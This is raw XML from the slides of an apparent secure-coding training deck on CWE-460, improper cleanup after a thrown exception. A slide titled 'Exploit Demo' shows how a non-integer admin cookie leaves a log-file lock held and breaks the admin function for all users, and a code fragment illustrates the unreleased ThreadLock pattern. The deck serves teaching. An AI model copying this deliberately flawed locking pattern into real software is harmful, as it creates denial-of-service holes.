        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1273014"/>
            <a:ext cx="7696200" cy="4808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109537" indent="0">
              <a:buNone/>
            </a:pP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CWE-460: Improper Cleanup on Thrown Exception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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The product does not clean up its state or incorrectly cleans up its state when an exception is thrown, leading to unexpected state or control flow. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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12680" y="442893"/>
            <a:ext cx="7924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Failure to Cleanup on Error – Exploit Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="831076" y="1295400"/>
            <a:ext cx="6226256" cy="3216265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>Application Logic Flow:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>	1) Acquire a lock on an admin log file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>	2) Grab value from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>insqradmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t> cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>	3) Verify / Cast value to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t> (we expect only 0 or 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>	4) If cast fails, report error and exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>	5) Log admin user access if value was 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>	6) Release lock on admin log file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1383488" y="5526975"/>
            <a:ext cx="6135014" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>After RUN 1, the admin function is broken for all users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> as the lock is never released.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547664" y="2117737"/>
            <a:ext cx="0" cy="1311263"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC99"/>
          </a:solidFill>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="EC8218"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="937119" y="3429000"/>
            <a:ext cx="5016117" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ERROR: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insqradmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cookie not passing an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> value?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5652120" y="2132856"/>
            <a:ext cx="0" cy="336408"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC99"/>
          </a:solidFill>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="EE8E2E"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428356" y="2252312"/>
            <a:ext cx="1087156" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0"/>
              <a:t>lock acquired</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367432" y="1904999"/>
            <a:ext cx="644728" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EE8E2E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EE8E2E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1277837" y="1905000"/>
            <a:ext cx="644728" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EE8E2E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EE8E2E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3816363" y="2521889"/>
            <a:ext cx="3740127" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ERROR: Cannot secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adminlog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> lock.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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28127" y="447658"/>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Real World Example – Improper Cleanup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="566289" y="1484784"/>
            <a:ext cx="6086475" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2395089" y="3598332"/>
            <a:ext cx="4267200" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>If function hits an error, it fails to secure a page lock. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>However, the fail code path attempts to call an unlock on a page that was not locked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Bug in the kernel causes system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="C:\Documents and Settings\lshields\Local Settings\Temporary Internet Files\Content.IE5\SCZIQGQN\MC90013348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312" y="4521671"/>
            <a:ext cx="1553085" cy="15462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Documents and Settings\lshields\Local Settings\Temporary Internet Files\Content.IE5\LZNE7R4B\MM900178313[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33647" y="3818409"/>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Documents and Settings\lshields\Local Settings\Temporary Internet Files\Content.IE5\LZNE7R4B\MM900178313[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88539" y="3818409"/>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Documents and Settings\lshields\Local Settings\Temporary Internet Files\Content.IE5\LZNE7R4B\MM900178313[1].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8799" y="3818409"/>
            <a:ext cx="66675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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="257860" y="571483"/>
            <a:ext cx="8153400" cy="4535316"/>
            <a:chOff x="499158" y="592344"/>
            <a:chExt cx="8153400" cy="4055855"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="499158" y="592344"/>
              <a:ext cx="8153400" cy="4055855"/>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400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>boolean</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>DoStuff</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ()</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 2    {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 3       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>try</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 4       {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 5          </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>while</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> (condition == true)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 6          {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 7             </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ThreadLock</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(TRUE);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 8             </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="339933"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// do some stuff</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 9             </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="339933"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// an exception may be thrown</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10             </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ThreadLock</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(FALSE);</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11          }</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>12       }</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
